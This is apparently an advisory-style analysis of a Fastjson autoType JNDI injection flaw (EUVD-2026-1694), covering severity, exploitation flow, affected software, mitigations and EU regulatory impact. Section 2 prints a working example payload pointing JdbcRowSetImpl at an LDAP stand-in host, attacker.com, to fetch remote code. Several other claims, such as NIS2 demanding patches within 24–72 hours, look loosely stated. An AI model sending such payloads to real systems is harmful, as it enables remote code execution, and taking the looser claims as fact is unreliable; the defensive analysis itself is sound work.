Description
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2026-1694 (Fastjson AutoType Remote Code Execution Vulnerability)
1. Vulnerability Assessment and Severity Evaluation
EUVD-2026-1694 (CVE-2025-70974) is a critical remote code execution (RCE) vulnerability in Fastjson, a widely used Java JSON parsing library. The flaw stems from insecure deserialization via the autoType feature, which allows attackers to instantiate arbitrary Java classes and execute malicious payloads through JNDI (Java Naming and Directory Interface) injection.
Severity Metrics (CVSS v3.1)
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 10.0 (Critical) | Maximum severity due to unauthenticated RCE with high impact on confidentiality, integrity, and availability. |
| Attack Vector (AV:N) | Network | Exploitable remotely over the internet. |
| Attack Complexity (AC:L) | Low | No special conditions required; straightforward exploitation. |
| Privileges Required (PR:N) | None | No authentication needed. |
| User Interaction (UI:N) | None | Exploitation does not require user interaction. |
| Scope (S:C) | Changed | Affects components beyond the vulnerable system (e.g., LDAP/RMI servers). |
| Confidentiality (C:H) | High | Attacker can exfiltrate sensitive data. |
| Integrity (I:H) | High | Attacker can modify system state or data. |
| Availability (A:H) | High | Attacker can crash or disable the system. |
Historical Context & Incomplete Fixes
- CVE-2017-18349 (original
autoTypebypass) was partially patched, but subsequent bypasses emerged. - CVE-2022-25845 introduced a new bypass technique, demonstrating that
autoTyperestrictions were insufficient. - EUVD-2026-1694 represents a regression or incomplete fix, allowing attackers to exploit
autoTypeagain via JNDI injection in Fastjson versions before 1.2.48.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
-
JSON Payload with
@typeKey- Attacker sends a crafted JSON payload containing an
@typefield specifying a malicious Java class (e.g.,com.sun.rowset.JdbcRowSetImpl). - Example payload:
{ "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://attacker.com:1389/Exploit", "autoCommit": true }
- Attacker sends a crafted JSON payload containing an
-
JNDI Lookup & Remote Code Execution
- Fastjson deserializes the payload and instantiates the specified class.
- The
JdbcRowSetImplclass performs a JNDI lookup, fetching a malicious Java object from an attacker-controlled LDAP/RMI server. - The attacker’s server returns a serialized payload (e.g., a
javax.el.ELProcessororgroovy.lang.GroovyShellexploit), leading to arbitrary code execution.
-
Alternative Exploitation Paths
- Log4Shell-like Attacks: If Fastjson is used in logging frameworks, attackers can inject JNDI payloads via log entries.
- Supply Chain Attacks: Compromised dependencies (e.g., vulnerable libraries using Fastjson) can be leveraged.
- Web Application Exploits: APIs or web services parsing untrusted JSON input are prime targets.
Real-World Exploitation (2023–2025)
- AndroxGh0st Malware: Exploited Fastjson in US university systems to deploy C2 (Command & Control) loggers.
- CloudSEK Report: Documented active exploitation in the wild, targeting misconfigured Fastjson instances.
- Vulhub Proof-of-Concept (PoC): Demonstrated RCE via
1.2.47-rceexploit.
3. Affected Systems and Software Versions
Vulnerable Versions
- Fastjson versions < 1.2.48 (all prior releases).
- Applications using Fastjson for JSON parsing, including:
- Web applications (Java Spring, Apache Struts, etc.).
- Microservices and APIs.
- Big data platforms (Hadoop, Spark).
- Enterprise middleware (Apache Kafka, Dubbo).
Notable Dependencies at Risk
| Software | Risk Level | Notes |
|---|---|---|
| Apache Dubbo | High | Uses Fastjson for serialization. |
| Alibaba Nacos | High | Configuration management tool. |
| Spring Boot (if Fastjson is used) | Medium | Defaults to Jackson, but custom configs may use Fastjson. |
| Hadoop Ecosystem | Medium | Some components rely on Fastjson. |
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade Fastjson
- Patch to version 1.2.48 or later (latest stable release).
- Verify no vulnerable versions remain in dependencies (
mvn dependency:treeorgradle dependencies).
-
Disable
autoType(If Upgrade is Not Possible)- Set
fastjson.parser.autoTypeSupport=falsein configuration. - Example (Java):
ParserConfig.getGlobalInstance().setAutoTypeSupport(false); - Warning: Some applications may break if they rely on
autoType.
- Set
-
Implement Input Validation
- Whitelist allowed classes for deserialization.
- Reject JSON with
@typeunless explicitly required.
-
Network-Level Protections
- Block outbound JNDI/LDAP/RMI traffic (e.g., via firewall rules).
- Use Web Application Firewalls (WAFs) to filter malicious JSON payloads.
-
Runtime Protections
- Java Security Manager: Restrict reflective access and JNDI lookups.
- RASP (Runtime Application Self-Protection): Detect and block deserialization attacks.
Long-Term Recommendations
- Replace Fastjson with safer alternatives (e.g., Jackson, Gson, or Moshi).
- Conduct dependency audits to identify and remediate vulnerable libraries.
- Monitor for exploitation attempts (e.g., unusual JNDI lookups in logs).
5. Impact on European Cybersecurity Landscape
Threat Landscape in the EU
- Critical Infrastructure at Risk: Fastjson is used in financial services, healthcare, and government systems across the EU.
- Supply Chain Risks: Many European enterprises rely on Alibaba Cloud, Apache projects, and open-source middleware, which may embed Fastjson.
- Regulatory Compliance Concerns:
- GDPR: Unauthorized access via RCE could lead to data breaches, triggering reporting obligations.
- NIS2 Directive: Critical entities must patch vulnerabilities within 24–72 hours of disclosure.
- DORA (Digital Operational Resilience Act): Financial institutions must ensure secure software supply chains.
Recent EU Incidents
- 2024–2025: Multiple European universities and research institutions reported Fastjson-related breaches.
- ENISA Threat Reports: Highlighted JNDI injection as a persistent threat in the EU, with Fastjson being a top vector.
Mitigation Challenges in the EU
- Legacy Systems: Many EU organizations struggle with outdated Java applications that cannot be easily patched.
- Third-Party Dependencies: European companies using Chinese open-source libraries (e.g., Alibaba’s ecosystem) face higher risks.
- Cross-Border Exploitation: Attackers leverage EU-based cloud providers to host malicious JNDI servers.
6. Technical Details for Security Professionals
Root Cause Analysis
- Insecure Deserialization: Fastjson’s
autoTypefeature blindly instantiates classes specified in@typewithout proper validation. - JNDI Injection: The
com.sun.rowset.JdbcRowSetImplclass (and others) performs JNDI lookups, enabling remote code execution. - Bypass Techniques:
- CVE-2022-25845: Used class name obfuscation (e.g.,
Lcom.sun.rowset.JdbcRowSetImpl;) to bypassautoTypeblacklists. - EUVD-2026-1694: Exploits incomplete blacklist updates in Fastjson 1.2.47.
- CVE-2022-25845: Used class name obfuscation (e.g.,
Exploitation Flow
- Attacker sends malicious JSON with
@typepointing to a vulnerable class. - Fastjson deserializes the payload and instantiates the class.
- JNDI lookup is triggered, fetching a malicious object from an attacker-controlled server.
- Remote code execution occurs when the object is deserialized.
Detection & Forensics
- Log Analysis:
- Look for unexpected JNDI lookups in application logs.
- Monitor for
@typefields in JSON input.
- Network Traffic:
- Detect LDAP/RMI connections to unknown external IPs.
- Memory Forensics:
- Check for unexpected Java class instantiations in heap dumps.
Proof-of-Concept (PoC) Analysis
- Vulhub’s
1.2.47-rce:- Demonstrates RCE via
JdbcRowSetImpl+ LDAP server. - Can be adapted for reverse shells, data exfiltration, or lateral movement.
- Demonstrates RCE via
- CloudSEK’s AndroxGh0st Report:
- Shows real-world exploitation in compromised university systems.
Defensive Coding Practices
- Use
SafeModein Fastjson (if available):ParserConfig.getGlobalInstance().setSafeMode(true); - Implement a custom
TypeHandlerto validate allowed classes. - Use
JSONPathor similar tools to sanitize JSON input before parsing.
Conclusion
EUVD-2026-1694 (CVE-2025-70974) is a critical RCE vulnerability in Fastjson that poses significant risks to European organizations, particularly those in finance, healthcare, and government. Given its CVSS 10.0 severity and active exploitation in the wild, immediate patching and mitigation are mandatory.
Key Takeaways for Security Teams
✅ Patch Fastjson to ≥1.2.48 or disable autoType.
✅ Monitor for JNDI injection attempts in logs and network traffic.
✅ Conduct dependency audits to identify vulnerable Fastjson instances.
✅ Implement WAF rules to block malicious JSON payloads.
✅ Consider migrating to safer JSON parsers (e.g., Jackson).
Failure to address this vulnerability could result in data breaches, ransomware attacks, or regulatory penalties under GDPR, NIS2, and DORA. Organizations should treat this as a top-priority security issue.